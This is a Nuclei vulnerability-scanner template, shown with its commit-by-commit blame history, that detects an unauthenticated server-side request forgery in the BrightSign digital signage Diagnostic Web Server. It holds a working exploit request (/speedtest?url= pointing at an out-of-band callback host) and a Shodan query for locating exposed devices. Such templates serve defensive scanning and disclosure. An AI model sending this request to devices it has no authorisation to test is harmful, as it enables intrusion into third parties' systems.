nuclei-templates/http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml

id: brightsign-dsdws-ssrf

info:
  name: BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated - SSRF
  author: 0x_Akoko
  severity: medium
  description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
  reference:
    - https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
    - https://www.zeroscience.mk/codes/brightsign_ssrf.txt
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"BrightSign"
  tags: ssrf,brightsign,unauth

http:
  - method: GET
    path:
      - '{{BaseURL}}/speedtest?url={{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: dsl
        dsl:
          - 'contains(body_1, "Downloaded")'
Create brightsign-dsdws-ssrf.yaml 2022-08-31 09:55:56 +00:00			`id: brightsign-dsdws-ssrf`

			`info:`
			`name: BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated - SSRF`
			`author: 0x_Akoko`
			`severity: medium`
			`description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.`
			`reference:`
			`- https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595`
			`- https://www.zeroscience.mk/codes/brightsign_ssrf.txt`
Update brightsign-dsdws-ssrf.yaml 2022-09-02 06:00:44 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
Update brightsign-dsdws-ssrf.yaml 2022-09-02 06:00:44 +00:00			`verified: true`
			`shodan-query: title:"BrightSign"`
Update brightsign-dsdws-ssrf.yaml 2022-09-05 19:11:39 +00:00			`tags: ssrf,brightsign,unauth`
Create brightsign-dsdws-ssrf.yaml 2022-08-31 09:55:56 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create brightsign-dsdws-ssrf.yaml 2022-08-31 09:55:56 +00:00			`- method: GET`
			`path:`
			`- '{{BaseURL}}/speedtest?url={{interactsh-url}}'`

Update brightsign-dsdws-ssrf.yaml 2022-09-05 19:11:39 +00:00			`matchers-condition: and`
Create brightsign-dsdws-ssrf.yaml 2022-08-31 09:55:56 +00:00			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`
Update brightsign-dsdws-ssrf.yaml 2022-09-05 19:11:39 +00:00
			`- type: dsl`
			`dsl:`
Update brightsign-dsdws-ssrf.yaml 2023-03-10 14:40:06 +00:00			`- 'contains(body_1, "Downloaded")'`